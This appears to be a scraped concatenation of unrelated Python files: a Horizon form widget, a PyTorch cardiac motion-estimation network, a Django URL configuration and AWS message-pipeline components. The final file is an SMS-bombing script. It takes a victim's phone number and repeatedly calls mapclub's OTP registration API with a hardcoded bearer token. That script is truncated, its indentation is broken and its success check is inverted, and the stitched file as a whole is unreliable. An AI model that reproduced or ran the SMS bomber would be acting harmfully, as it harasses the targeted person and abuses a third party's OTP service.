# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools as it
import floppyforms as floppy
class TriStateCheckboxSelectMultiple(floppy.widgets.Input):
    """Renders tri-state multi-selectable checkbox.
    .. note:: Subclassed from ``CheckboxSelectMultiple`` and not from
        ``SelectMultiple`` only to make
        ``horizon.templatetags.form_helpers.is_checkbox`` able to recognize
        this widget.
        Otherwise template ``horizon/common/_form_field.html`` would render
        this widget slightly incorrectly.
    """
    template_name = 'common/tri_state_checkbox/base.html'
    # posted string -> tri-state Python value
    VALUES_MAP = {
        'True': True,
        'False': False,
        'None': None
    }

    def get_context(self, name, value, attrs=None, choices=()):
        """Renders html and JavaScript.
        :param value: Dictionary of form
            Choice => Value (Checked|Unchecked|Indeterminate)
        :type value: dict
        """
        context = super(TriStateCheckboxSelectMultiple, self).get_context(
            name, value, attrs
        )
        choices = dict(it.chain(self.choices, choices))
        if value is None:
            # no submitted data: every choice starts unchecked
            value = dict.fromkeys(choices, False)
        else:
            # NOTE(review): dict.items() + dict.items() and iteritems() below
            # are Python 2 only; this module cannot run unchanged on Python 3.
            value = dict(dict.fromkeys(choices, False).items() +
                         value.items())
        context['values'] = [
            (choice, label, value[choice])
            for choice, label in choices.iteritems()
        ]
        return context

    @classmethod
    def parse_value(cls, value):
        """Converts encoded string with value to Python values."""
        choice, value = value.split('=')
        value = cls.VALUES_MAP[value]
        return choice, value

    def value_from_datadict(self, data, files, name):
        """Expects values in ``"key=False/True/None"`` form."""
        try:
            values = data.getlist(name)
        except AttributeError:
            # plain dict without QueryDict.getlist: fall back to one value
            if name in data:
                values = [data[name]]
            else:
                values = []
        return dict(map(self.parse_value, values))
class ExtraContextWidgetMixin(object):
    """Widget mixin that merges an ``extra_context`` dict (accepted as a
    constructor keyword) into the context produced by the base widget."""

    def __init__(self, *args, **kwargs):
        # FIX: pop our keyword *before* delegating. Previously super() was
        # called first, so 'extra_context' leaked into the base __init__
        # (TypeError for bases that reject unknown kwargs), and the pop
        # afterwards never had any effect on what super() received.
        self.extra_context = kwargs.pop('extra_context', {})
        super(ExtraContextWidgetMixin, self).__init__(*args, **kwargs)

    def get_context(self, *args, **kwargs):
        """Extend the base context with the extra entries."""
        context = super(ExtraContextWidgetMixin, self).get_context(
            *args, **kwargs
        )
        context.update(self.extra_context)
        return context
|
import torch
from torch import nn
import torch.nn.functional as F
def relu():
    """Factory for an in-place ReLU activation layer."""
    activation = nn.ReLU(inplace=True)
    return activation
def conv(in_channels, out_channels, kernel_size=(3,3,3), stride=(1,1,1), padding = 1, nonlinearity = relu):
    """Conv3d -> BatchNorm3d -> activation, packaged as one Sequential."""
    convolution = nn.Conv3d(in_channels=in_channels, out_channels=out_channels,
                            kernel_size=kernel_size, stride=stride,
                            padding=padding, bias=False)
    activation = nonlinearity()
    norm = nn.BatchNorm3d(out_channels)
    return nn.Sequential(convolution, norm, activation)
def deconv(in_channels, out_channels, kernel_size=(3,3,3), stride=(1,1,1), padding = 1, nonlinearity = relu):
    """ConvTranspose3d -> BatchNorm3d -> activation, as one Sequential."""
    deconvolution = nn.ConvTranspose3d(in_channels=in_channels,
                                       out_channels=out_channels,
                                       kernel_size=kernel_size, stride=stride,
                                       padding=padding, output_padding=1,
                                       bias=False)
    activation = nonlinearity()
    norm = nn.BatchNorm3d(out_channels)
    return nn.Sequential(deconvolution, norm, activation)
def conv_blocks_2(in_channels, out_channels, strides=(1,1,1)):
    """Two stacked 3D conv blocks; only the first may downsample."""
    return nn.Sequential(
        conv(in_channels, out_channels, stride=strides),
        conv(out_channels, out_channels, stride=(1, 1, 1)),
    )
def conv_blocks_3(in_channels, out_channels, strides=(1,1,1)):
    """Three stacked 3D conv blocks; only the first may downsample."""
    return nn.Sequential(
        conv(in_channels, out_channels, stride=strides),
        conv(out_channels, out_channels, stride=(1, 1, 1)),
        conv(out_channels, out_channels, stride=(1, 1, 1)),
    )
def fullyconnect(in_features, out_features, out_channels, nonlinearity = relu):
    """Linear -> BatchNorm1d -> activation, packaged as one Sequential."""
    linear = nn.Linear(in_features=in_features, out_features=out_features,
                       bias=False)
    activation = nonlinearity()
    norm = nn.BatchNorm1d(out_channels)
    return nn.Sequential(linear, norm, activation)
def conv_2D(in_channels, out_channels, kernel_size=3, stride=1, padding = 1, nonlinearity = relu):
    """Conv2d -> BatchNorm2d -> activation, packaged as one Sequential."""
    convolution = nn.Conv2d(in_channels=in_channels, out_channels=out_channels,
                            kernel_size=kernel_size, stride=stride,
                            padding=padding, bias=False)
    activation = nonlinearity()
    norm = nn.BatchNorm2d(out_channels)
    return nn.Sequential(convolution, norm, activation)
def deconv_2D(in_channels, out_channels, kernel_size=3, stride=1, padding = 1, nonlinearity = relu):
    """ConvTranspose2d -> BatchNorm2d -> activation, as one Sequential."""
    deconvolution = nn.ConvTranspose2d(in_channels=in_channels,
                                       out_channels=out_channels,
                                       kernel_size=kernel_size, stride=stride,
                                       padding=padding, output_padding=1,
                                       bias=False)
    activation = nonlinearity()
    norm = nn.BatchNorm2d(out_channels)
    return nn.Sequential(deconvolution, norm, activation)
def conv_blocks_2_2D(in_channels, out_channels, strides=1):
    """Two stacked 2D conv blocks; only the first may downsample."""
    return nn.Sequential(
        conv_2D(in_channels, out_channels, stride=strides),
        conv_2D(out_channels, out_channels, stride=1),
    )
def conv_blocks_3_2D(in_channels, out_channels, strides=1):
    """Three stacked 2D conv blocks; only the first may downsample."""
    return nn.Sequential(
        conv_2D(in_channels, out_channels, stride=strides),
        conv_2D(out_channels, out_channels, stride=1),
        conv_2D(out_channels, out_channels, stride=1),
    )
def generate_grid(x, offset):
    """Build a sampling grid for F.grid_sample: the identity grid over x's
    three spatial dimensions (in normalized [-1, 1] coordinates) displaced
    by *offset*.

    :param x: 5-D reference tensor; only its .size() is used
    :param offset: displacement field, split along dim 1 into 3 components
    :return: grid stacked along a new last dim in (h, w, d) order
    """
    x_shape = x.size()
    # identity grid in [-1, 1] along each spatial dimension
    grid_d, grid_w, grid_h = torch.meshgrid([torch.linspace(-1, 1, x_shape[2]), torch.linspace(-1, 1, x_shape[3]), torch.linspace(-1, 1, x_shape[4])]) # (h, w, h)
    # NOTE(review): .cuda() hard-codes GPU execution -- this fails on a
    # CPU-only machine; consider using x.device instead.
    grid_d = grid_d.cuda().float()
    grid_w = grid_w.cuda().float()
    grid_h = grid_h.cuda().float()
    grid_d = nn.Parameter(grid_d, requires_grad=False)
    grid_w = nn.Parameter(grid_w, requires_grad=False)
    grid_h = nn.Parameter(grid_h, requires_grad=False)
    # offset channels are ordered (h, w, d) along dim 1
    offset_h, offset_w, offset_d = torch.split(offset, 1, 1)
    offset_d = offset_d.contiguous().view(-1, int(x_shape[2]), int(x_shape[3]), int(x_shape[4])) # (b*c, d, w, h)
    offset_w = offset_w.contiguous().view(-1, int(x_shape[2]), int(x_shape[3]), int(x_shape[4])) # (b*c, d, w, h)
    offset_h = offset_h.contiguous().view(-1, int(x_shape[2]), int(x_shape[3]), int(x_shape[4])) # (b*c, d, w, h)
    # displace the identity grid by the predicted offsets
    offset_d = grid_d + offset_d
    offset_w = grid_w + offset_w
    offset_h = grid_h + offset_h
    offsets = torch.stack((offset_h, offset_w, offset_d), 4) # should have the same order as offset
    return offsets
def transform(seg_source, loc, mode='bilinear'):
    """Warp *seg_source* (NCDHW) by the displacement field *loc*.

    For 5-D inputs, mode='bilinear' is interpreted by grid_sample as
    trilinear interpolation.
    """
    sampling_grid = generate_grid(seg_source, loc)
    return F.grid_sample(seg_source, sampling_grid, mode=mode, align_corners=True)
class MotionMesh_25d(nn.Module):
    """2.5D motion + mesh estimation network.

    Takes short-axis (sa), 2-chamber (2ch) and 4-chamber (4ch) views plus
    their ED counterparts (``*_ed``) and produces, in the returned dict:
      * ``net['out']``         — tanh-bounded 3-channel 3D motion field,
      * ``net['out_edge']``    — 2-channel edge/mesh map for the current frame,
      * ``net['out_edge_ed']`` — 2-channel edge/mesh map for the ED frame.
    """
    def __init__(self, n_ch=64):
        super(MotionMesh_25d, self).__init__()
        # Shared 5-stage 2D encoder; stages 2-5 downsample (stride 2).
        self.conv_blocks_2D = [conv_blocks_2_2D(n_ch, 64), conv_blocks_2_2D(64, 128, 2), conv_blocks_3_2D(128, 256, 2),
                               conv_blocks_3_2D(256, 512, 2), conv_blocks_3_2D(512, 512, 2)]
        # Per-stage fusion convs; input channels are doubled because the
        # current and ED features are concatenated before fusion.
        self.conv_list_2D = []
        for in_filters in [128, 256, 512, 1024, 1024]:
            self.conv_list_2D += [conv_2D(in_filters, 64)]
        # nn.Sequential is used only as a module container here; the blocks
        # are indexed one by one in forward().
        self.conv_blocks_2D = nn.Sequential(*self.conv_blocks_2D)
        self.conv_list_2D = nn.Sequential(*self.conv_list_2D)
        # Fuse 3 views x 5 scales x 64 channels into one 64-channel map.
        self.conv6 = conv_2D(64 * 15, 64, 1, 1, 0)
        self.conv7 = conv_2D(64, 64, 1, 1, 0)
        # 3D encoder-decoder over the fused feature volume (motion branch).
        self.conv3d9 = conv(1, 32, kernel_size=(3, 3, 3), stride=(1, 1, 1))
        self.conv3d10 = conv(32, 64, kernel_size=(3, 3, 3), stride=(2, 2, 2))
        self.conv3d10_1 = conv(64, 64, kernel_size=(3, 3, 3), stride=(1, 1, 1))
        self.conv3d11 = conv(64, 128, kernel_size=(3, 3, 3), stride=(2, 2, 2))
        self.conv3d11_1 = conv(128, 128, kernel_size=(3, 3, 3), stride=(1, 1, 1))
        self.conv3d12 = conv(128, 256, kernel_size=(3, 3, 3), stride=(2, 2, 2))
        self.conv3d12_1 = conv(256, 256, kernel_size=(3, 3, 3), stride=(1, 1, 1))
        self.conv3d13 = deconv(256, 128, kernel_size=(3, 3, 3), stride=(2, 2, 2))
        self.conv3d13_1 = conv(128, 128, kernel_size=(3, 3, 3), stride=(1, 1, 1))
        self.conv3d14 = deconv(128, 64, kernel_size=(3, 3, 3), stride=(2, 2, 2))
        self.conv3d14_1 = conv(64, 64, kernel_size=(3, 3, 3), stride=(1, 1, 1))
        self.conv3d15 = deconv(64, 32, kernel_size=(3, 3, 3), stride=(2, 2, 2))
        self.conv3d15_1 = conv(32, 32, kernel_size=(3, 3, 3), stride=(1, 1, 1))
        # Final 1x1x1 conv to a 3-channel displacement field.
        self.conv3d16 = nn.Conv3d(32, 3, 1, stride=(1, 1, 1))
        # 2D decoder of the mesh/edge branch, fed with stage-5 view features.
        self.conv2d9 = conv_2D(512*3, 512*2, kernel_size=3, stride=1)
        self.conv2d10 = deconv_2D(512*2, 512, kernel_size=3, stride=2)
        self.conv2d10_1 = conv_2D(512, 512, kernel_size=3, stride=1)
        self.conv2d11 = deconv_2D(512, 256, kernel_size=3, stride=2)
        self.conv2d11_1 = conv_2D(256, 256, kernel_size=3, stride=1)
        self.conv2d12 = deconv_2D(256, 128, kernel_size=3, stride=2)
        self.conv2d12_1 = conv_2D(128, 128, kernel_size=3, stride=1)
        self.conv2d13 = deconv_2D(128, 64, kernel_size=3, stride=2)
        self.conv2d13_1 = conv_2D(64, 64, kernel_size=3, stride=1)
        # Small 3D head producing the 2-channel edge output.
        self.conv3d17 = conv(1, 2, 3, stride=(1, 1, 1))
        self.conv3d18 = nn.Conv3d(2, 2, 1,stride=(1, 1, 1))
    def forward(self, x_sa, x_saed, x_2ch, x_2ched, x_4ch, x_4ched):
        # x: source image; x_pred: target image;
        net = {}
        net['conv0_sa'] = x_sa
        net['conv0_sa_ed'] = x_saed
        net['conv0_2ch'] = x_2ch
        net['conv0_2ch_ed'] = x_2ched
        net['conv0_4ch'] = x_4ch
        net['conv0_4ch_ed'] = x_4ched
        # 5 refers to 5 output or 5 blocks
        for i in range(5):
            # Encode every view (and its ED counterpart) with the shared stage i.
            net['conv%d_sa' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_sa' % i])
            net['conv%d_sa_ed' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_sa_ed' % i])
            net['conv%d_2ch' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_2ch' % i])
            net['conv%d_2ch_ed' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_2ch_ed' % i])
            net['conv%d_4ch' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_4ch' % i])
            net['conv%d_4ch_ed' % (i + 1)] = self.conv_blocks_2D[i](net['conv%d_4ch_ed' % i])
            # Pair each view with its ED features, then fuse to 64 channels.
            net['concat%d_sa' % (i + 1)] = torch.cat((net['conv%d_sa' % (i + 1)], net['conv%d_sa_ed' % (i + 1)]), 1)
            net['concat%d_2ch' % (i + 1)] = torch.cat((net['conv%d_2ch' % (i + 1)], net['conv%d_2ch_ed' % (i + 1)]), 1)
            net['concat%d_4ch' % (i + 1)] = torch.cat((net['conv%d_4ch' % (i + 1)], net['conv%d_4ch_ed' % (i + 1)]), 1)
            net['out%d_sa' % (i + 1)] = self.conv_list_2D[i](net['concat%d_sa' % (i + 1)])
            net['out%d_2ch' % (i + 1)] = self.conv_list_2D[i](net['concat%d_2ch' % (i + 1)])
            net['out%d_4ch' % (i + 1)] = self.conv_list_2D[i](net['concat%d_4ch' % (i + 1)])
            if i > 0:
                # upsample DHW dimension
                net['out%d_sa_up' % (i + 1)] = F.interpolate(net['out%d_sa' % (i + 1)], scale_factor=2 ** i, mode='bilinear', align_corners=True)
                net['out%d_2ch_up' % (i + 1)] = F.interpolate(net['out%d_2ch' % (i + 1)], scale_factor=2 ** i, mode='bilinear', align_corners=True)
                net['out%d_4ch_up' % (i + 1)] = F.interpolate(net['out%d_4ch' % (i + 1)], scale_factor=2 ** i, mode='bilinear', align_corners=True)
        # output: net['out1_sa'], net['out2_sa_up'], net['out3_sa_up'], net['out4_sa_up'], net['out5_sa_up'] are used for multiscale fusion
        net['concat_sa'] = torch.cat((net['out1_sa'], net['out2_sa_up'], net['out3_sa_up'], net['out4_sa_up'], net['out5_sa_up']), 1)
        net['concat_2ch'] = torch.cat((net['out1_2ch'], net['out2_2ch_up'], net['out3_2ch_up'], net['out4_2ch_up'], net['out5_2ch_up']), 1)
        net['concat_4ch'] = torch.cat((net['out1_4ch'], net['out2_4ch_up'], net['out3_4ch_up'], net['out4_4ch_up'], net['out5_4ch_up']), 1)
        net['concat'] = torch.cat((net['concat_sa'], net['concat_2ch'], net['concat_4ch']),1)
        net['comb_1'] = self.conv6(net['concat'])
        net['comb_2'] = self.conv7(net['comb_1'])
        # Add a singleton channel dim so the fused 2D map becomes a 3D volume.
        net['conv3d0f'] = net['comb_2'].unsqueeze(1)
        # 3D encoder-decoder producing the motion field.
        net['conv3d_1'] = self.conv3d9(net['conv3d0f'])
        net['conv3d_2'] = self.conv3d10_1(self.conv3d10(net['conv3d_1']))
        net['conv3d_3'] = self.conv3d11_1(self.conv3d11(net['conv3d_2']))
        net['conv3d_4'] = self.conv3d12_1(self.conv3d12(net['conv3d_3']))
        net['conv3d_5'] = self.conv3d13_1(self.conv3d13(net['conv3d_4']))
        net['conv3d_6'] = self.conv3d14_1(self.conv3d14(net['conv3d_5']))
        net['conv3d_7'] = self.conv3d15_1(self.conv3d15(net['conv3d_6']))
        # tanh bounds the displacement field to [-1, 1].
        net['out'] = torch.tanh(self.conv3d16(net['conv3d_7']))
        # Estimate mesh
        # ED-frame edge branch: decode stage-5 ED features of the three views.
        net['concat_edge_ed'] = torch.cat((net['conv5_sa_ed'], net['conv5_2ch_ed'], net['conv5_4ch_ed']), 1)
        net['conv2d_0_ed'] = self.conv2d9(net['concat_edge_ed'])
        net['conv2d_1_ed'] = self.conv2d10_1(self.conv2d10(net['conv2d_0_ed']))
        net['conv2d_2_ed'] = self.conv2d11_1(self.conv2d11(net['conv2d_1_ed']))
        net['conv2d_3_ed'] = self.conv2d12_1(self.conv2d12(net['conv2d_2_ed']))
        net['conv2d_4_ed'] = self.conv2d13_1(self.conv2d13(net['conv2d_3_ed']))
        net['conv3d_edge_ed'] = net['conv2d_4_ed'].unsqueeze(1)
        net['out_edge_ed'] = self.conv3d18(self.conv3d17(net['conv3d_edge_ed']))
        # Same decoder weights applied to the current-frame features.
        net['concat_edge'] = torch.cat((net['conv5_sa'], net['conv5_2ch'], net['conv5_4ch']), 1)
        net['conv2d_0'] = self.conv2d9(net['concat_edge'])
        net['conv2d_1'] = self.conv2d10_1(self.conv2d10(net['conv2d_0']))
        net['conv2d_2'] = self.conv2d11_1(self.conv2d11(net['conv2d_1']))
        net['conv2d_3'] = self.conv2d12_1(self.conv2d12(net['conv2d_2']))
        net['conv2d_4'] = self.conv2d13_1(self.conv2d13(net['conv2d_3']))
        net['conv3d_edge'] = net['conv2d_4'].unsqueeze(1)
        net['out_edge'] = self.conv3d18(self.conv3d17(net['conv3d_edge']))
        return net
class Mesh_2d(nn.Module):
    """Shallow two-layer 2D conv encoder applied independently to four views
    (2ch/4ch and their ED counterparts, suffixed ``s``)."""
    def __init__(self, n_ch=1):
        super(Mesh_2d, self).__init__()
        self.conv1 = conv_2D(n_ch, 32)
        self.conv2 = conv_2D(32, 64)
    def forward(self, x_2ch, x_2ched, x_4ch, x_4ched):
        """Return a dict of level-1 and level-2 features for every view."""
        views = (('_2ch', x_2ch), ('_4ch', x_4ch), ('s_2ch', x_2ched), ('s_4ch', x_4ched))
        net = {}
        # First all level-1 features, then all level-2, so the dict keeps the
        # same insertion order the original callers may rely on.
        for suffix, image in views:
            net['conv1' + suffix] = self.conv1(image)
        for suffix, _ in views:
            net['conv2' + suffix] = self.conv2(net['conv1' + suffix])
        return net
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
# NOTE(review): django.conf.urls.patterns() and string view references were
# deprecated in Django 1.8 and removed in 1.10 — this module presumably
# targets Django < 1.10; confirm the pinned version before upgrading.
urlpatterns = patterns(
    '',
    # Home view also serves the /sync path.
    url(r'^$|^sync', 'cal.views.home', name='home'),
    url(r'^admin/', include(admin.site.urls)),
    # Unmatched admin/ URLs fall through to django-loginas.
    url(r'^admin/', include('loginas.urls')),
    url(r'^admin/generate-categories', 'cal.views.generate_categories',
        name='generate_categories'),
    url(r'^logout$', 'cal.views.logout_view', name='logout_view'),
    url(r'^auth/google', 'cal.views.google_auth', name='google_auth'),
    url(r'^auth/clear', 'cal.views.clear_auth', name='clear_auth'),
    url(r'^complete-with-token/(?P<backend>[^/]+)/$',
        'cal.views.complete_with_token', name='complete_with_token'),
    url(r'^accounts/profile', 'cal.views.accounts_profile', name='accounts_profile'),
    # Django REST framework
    url(r'^', include('api.urls')),
    # Python social auth
    url('', include('social.apps.django_app.urls', namespace='social')),
)
|
"""
Defines components.
- PipelineComponent: receive message from a queue, publishes to a topic
- SourceComponent: generates data somehow (e.g. external fetch), publishes to a topic
- SinkComponent: receive messages, do not publish anything
- NullComponent: does not receive or publish anything
"""
import typing
import contextlib
import copy
import itertools
import functools
from . import aws
from .models.messages import BaseMessage, ObjectType, IngestionMessage
from .models.ingestion import IngestionStep
from .models.data import DataAsset
from .interfaces.messaging import MessageProducer, MessageConsumer, NoMessagesAvailable, MessageTooLarge, MessageStore
from .interfaces.entrypoint import Entrypoint
from .io import FolderMessageProducerConsumer
from .utils import logging
from .utils import timed, catchAllExceptionsToLog
class Component(Entrypoint):
    """Base class for pipeline components.

    Wires ``self.coreFunction`` to an optional input message producer
    (``PYLON_INPUT``) and an optional output message consumer
    (``PYLON_OUTPUT``); subclasses choose the combination by implementing
    ``makeAdapters``.
    """

    @timed('total')
    @catchAllExceptionsToLog
    def runOnce(self):
        """
        Process a single message
        """
        logging.info('heartbeat: run_once')
        if self._hasInput:
            try:
                # getMessage() is a context manager, so the message is
                # acknowledged / returned appropriately on exit.
                with self.inputMessageProducer.getMessage() as message:
                    self._runOnce(message)
            except NoMessagesAvailable:
                pass  # an empty queue is normal for a polling component
        else:
            self._runOnce(None)

    def lambda_handler(self, event, context):
        """AWS Lambda entry point: drain the pseudo-queue built from *event*."""
        logging.info('heartbeat: lambda_handler')
        if self._hasInput:
            self.inputMessageProducer = aws.lambda_.PseudoQueue(event)
            while len(self.inputMessageProducer) > 0:
                # PYLON_ALLOW_EXCEPTIONS is presumably consumed by the
                # catchAllExceptionsToLog decorator — confirm against utils.
                self.runOnce(PYLON_ALLOW_EXCEPTIONS=True)
        else:
            self.runOnce(PYLON_ALLOW_EXCEPTIONS=True)

    def _runOnce(self, message: BaseMessage):
        """Run the core function for one message and emit its outputs."""
        ingestionStep = self._getIngestionStep(message)
        logging.updateLogger(
            ingestionId=ingestionStep.ingestionId, logFormat=self.config['PYLON_LOG_FORMAT'],
            logLevel=self.config['PYLON_LOG_LEVEL']
        )
        logging.info({
            'message': 'heartbeat: core_process',
            'parentIngestionId': str(ingestionStep.parentIngestionId)
        })
        results = self._processInput(message=message)
        if self._hasOutput:
            if results is not None:
                self._processOutput(results, ingestionStep)
            else:
                logging.warning('Component did not produce any output')
        # add duration time to ingestionStep
        ingestionStep.updateMetadata({'durationSeconds': self.coreFunction.durationSeconds})
        logging.info(f'INGESTION_STEP: {ingestionStep.toJSON()}')
        logging.tearDownLogging(
            logFormat=self.config['PYLON_LOG_FORMAT'], logLevel=self.config['PYLON_LOG_LEVEL']
        )

    def _processInput(self, message):
        """Check out a stored payload if needed, then run the core function."""
        if message is not None and message.isCheckedIn():
            message = _retrieveMessageBody(message)
        results = self.coreFunction(message, self.config)
        return results

    def _processOutput(self, results, ingestionStep):
        """Stamp, store (if large) and send every non-None result message."""
        if not isinstance(results, typing.Iterable):
            results = [results]
        results = (
            _storeMessageBody(_populateMessageAttributes(msg, ingestionStep), self.config)
            for msg in results
            if msg is not None
        )
        self._sendMessages(results)

    def _getIngestionStep(self, message: BaseMessage):
        """Create the ingestion step for this run, linked to the parent's id."""
        ingestionStep = IngestionStep()
        parentIngestionId = message.ingestionId if message is not None else None
        ingestionStep.populate(config=self.config, parentIngestionId=parentIngestionId)
        return ingestionStep

    def _sendMessages(self, messages: typing.Iterable[BaseMessage]):
        """Send messages downstream, re-raising MessageTooLarge with guidance."""
        if messages is not None:
            messages = (message for message in messages if message is not None)
            try:
                self.outputMessageConsumer.sendMessages(messages)
            except MessageTooLarge as err:
                # Chain the original exception so the real size/limit details
                # stay visible in the traceback.
                raise MessageTooLarge(
                    'Failed to send message because it is too large. Try using '
                    'PYLON_STORE_DESTINATION and PYLON_STORE_MIN_MESSAGE_BYTES to store the body '
                    'of large messages before sending them.'
                ) from err

    def _getInputFromConfig(self) -> MessageProducer:
        """Build the input producer from the PYLON_INPUT URI scheme."""
        inp = self.config['PYLON_INPUT']
        if inp.startswith('sqs://'):
            return aws.sqs.Queue(inp[6:])
        if inp.startswith('folder://'):
            return FolderMessageProducerConsumer(inp[9:])
        raise NotImplementedError(f"Unsupported input {self.config['PYLON_INPUT']}")

    def _getOutputFromConfig(self) -> MessageConsumer:
        """Build the output consumer from the PYLON_OUTPUT URI scheme."""
        output = self.config['PYLON_OUTPUT']
        if output.startswith('sns://'):
            return aws.sns.Topic(output[6:])
        if output.startswith('sqs://'):
            return aws.sqs.Queue(output[6:])
        if output.startswith('folder://'):
            return FolderMessageProducerConsumer(output[9:])
        raise NotImplementedError(f"Unsupported output {self.config['PYLON_OUTPUT']}")

    @property
    def _hasInput(self):
        # The adapter attribute only exists if makeAdapters created it.
        try:
            return self.inputMessageProducer is not None
        except AttributeError:
            return False

    @property
    def _hasOutput(self):
        # The adapter attribute only exists if makeAdapters created it.
        try:
            return self.outputMessageConsumer is not None
        except AttributeError:
            return False
class PipelineComponent(Component):
    """A mid-pipeline component: consumes one input message, publishes one or
    more output messages (e.g. a data-transformation step).

    Decorate a function with this class to get input-queue, output-topic and
    ingestion plumbing for free.

    Usage:
    ```
    @PipelineComponent
    def myWorkflow(
        message: BaseMessage,
        config: dict
    ) -> typing.Union[BaseMessage, typing.Iterable[BaseMessage]]:
        # transform the message and return the results
        pass

    if __name__ == '__main__':
        myWorkflow.runForever()
    ```
    """
    def makeAdapters(self):
        # Needs both sides: read from PYLON_INPUT, publish to PYLON_OUTPUT.
        self.inputMessageProducer = self._getInputFromConfig()
        self.outputMessageConsumer = self._getOutputFromConfig()
class SourceComponent(Component):
    """A pipeline "source": produces output messages without consuming any
    input — typically a fetcher triggered by an external scheduler.

    Often combined with `PYLON_LOOP_SLEEP_SECONDS`, which sets the number of
    seconds between invocations of the decorated function.

    Usage:
    ```
    @SourceComponent
    def myWorkflow(
        message: BaseMessage
        config: dict
    ) -> typing.Union[BaseMessage, typing.Iterable[BaseMessage]]:
        # fetch/generate some data and return the results
        pass

    if __name__ == '__main__':
        myWorkflow.runOnce()
    ```
    """
    def makeAdapters(self):
        # Output side only; no input producer is ever created.
        self.outputMessageConsumer = self._getOutputFromConfig()
class SinkComponent(Component):
    """A pipeline "sink": consumes input messages and produces no output
    (e.g. persisting results somewhere).

    Decorate a function with this class to get input-queue plumbing for free.

    Usage:
    ```
    @SinkComponent
    def myWorkflow(
        message: BaseMessage,
        config: dict
    ) -> None:
        # consume the message
        pass

    if __name__ == '__main__':
        myWorkflow.runForever()
    ```
    """
    def makeAdapters(self):
        # Input side only; no output consumer is ever created.
        self.inputMessageProducer = self._getInputFromConfig()
class NullComponent(Component):
    """A component with neither input nor output — useful for running
    periodic work on a timer in ECS. Often combined with
    `PYLON_LOOP_SLEEP_SECONDS`, which sets the number of seconds between
    invocations of the decorated function.

    Usage:
    ```
    @NullComponent
    def myWorkflow(
        message: BaseMessage,
        config: dict,
    ) -> None:
        del message
        # do something interesting
        pass

    if __name__ == '__main__':
        myWorkflow.runForever()
    ```
    """
    # No adapters at all: the base class treats the missing attributes as
    # "no input, no output".
    pass
def _populateMessageAttributes(
    message: BaseMessage,
    ingestionStep: IngestionStep
):
    """Return a deep copy of *message* stamped with the ingestion step's
    identity (ingestionId, artifactName, artifactVersion)."""
    stamped = copy.deepcopy(message)
    stamped.ingestionId = ingestionStep.ingestionId
    stamped.artifactName = ingestionStep.artifactName
    stamped.artifactVersion = ingestionStep.artifactVersion
    # double happiness if data asset
    # 囍
    # Data assets carry the ingestion id twice more: on the asset body and
    # on every data row.
    if stamped.objectType == ObjectType.DATA_ASSET:
        stamped.body.ingestionId = ingestionStep.ingestionId
        for record in stamped.body.data:
            record['ingestion_id'] = ingestionStep.ingestionId
    return stamped
def _getStoreFromConfig(config: dict) -> MessageStore:
    """Build the payload store named by PYLON_STORE_DESTINATION, or None
    when no store is configured."""
    destination = config.get('PYLON_STORE_DESTINATION')
    if destination is None:
        return None
    if destination.startswith('s3://'):
        return aws.s3.MessageStore(destination)
    raise NotImplementedError(f"Unsupported message store {config['PYLON_STORE_DESTINATION']}")
def _storeMessageBody(message: BaseMessage, config: dict) -> BaseMessage:
    """Check a large message body into the configured store, when one exists.

    Returns the (possibly checked-in) message unchanged in every other case.
    """
    if message.isCheckedIn():
        logging.debug('Message is already checked in, not checking in again.')
        return message
    store = _getStoreFromConfig(config)
    threshold = config.get('PYLON_STORE_MIN_MESSAGE_BYTES')
    # Both a store and a size threshold must be configured before we even
    # measure the message (preserves the original short-circuit).
    if store is None or threshold is None:
        return message
    if message.getApproxSize() < threshold:
        return message
    logging.info('Message too large, checking message in.')
    return store.checkInPayload(message)
def _retrieveMessageBody(message: BaseMessage) -> BaseMessage:
    """Check a message's payload back out of its store and decode the body."""
    if not message.isCheckedIn():
        raise ValueError('message is not checked in anywhere???')
    if not message.payloadStoreKey.startswith('s3://'):
        # how did they make the message????!?!
        raise NotImplementedError(f"Unsupported message store for {message.payloadStoreKey}")
    message = aws.s3.MessageStore.checkOutPayload(message)
    # Load message body from json if applicable
    # This usually happens in decode but didn't because the message body only available now
    if message.objectType == ObjectType.DATA_ASSET:
        message.body = DataAsset.fromJSON(message.body)
    if message.objectType == ObjectType.INGESTION_STEP:
        message.body = IngestionStep.fromJSON(message.body)
    return message
|
import requests
import json
import os
import time
from requests import post
os.system("clear")
os.system("figlet Zendot-H")
time.sleep(1)
banner="""
\t Spam SMS
--------------------------------------
[+]Author: Zendot-H
[+]Github: https://github.com/Zaeni123
----------------------------------------
"""
print(banner)
nomor=input("Masukkan Nomor Target(08): ")
jumlah=int(input("Jumlah: "))
print()
headers={
"Host":"beryllium.mapclub.com",
"content-length":"24",
"client-platform":"WEB",
"client-timestamp":"1629017047573",
"authorization":"Bearer eyJhbGciOiJIUzUxMiJ9.eyJndWVzdENvZGUiOiIzMmVmODZjMy01YmNjLTRiMjUtOWIyOC02Njg3YmQ5Y2MwNWQiLCJleHBpcmVkIjoxNjI5MDIwNjE3MzM1LCJleHBpcmUiOjM2MDAsImV4cCI6MTYyOTAyMDYxNywiaWF0IjoxNjI5MDE3MDE3LCJwbGF0Zm9ybSI6IldFQJ9.1jcjv77xteNP2EpxsiC6d5SIHYKBQHo_hMMDFuOLr4s2M_9r5V0RLjNLz0SVq-SdzJIo2kLhvsNXgm0OGjf91g",
"accept":"application/json, text/plain, */*",
"content-type":"application/json",
"accept-language":"en-US",
"user-agent":"Mozilla/5.0 (Linux; Android 7.1.1; SM-J250F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.110 Mobile Safari/537.36",
"save-data":"on",
"origin":"https://www.mapclub.com",
"sec-fetch-site":"same-site",
"sec-fetch-mode":"cors",
"sec-fetch-dest":"empty",
"referer":"https://www.mapclub.com/",
"accept-encoding":"gzip, deflate, br",
}
data={
"msisdn":nomor,
}
for i in range(int(jumlah)):
respon=requests.post("https://beryllium.mapclub.com/api/sms/otp/registration",headers=headers,json=data)
zen=json.loads(respon.text)
if zen["success"]==False:
print('Spam sms sukses')
else:
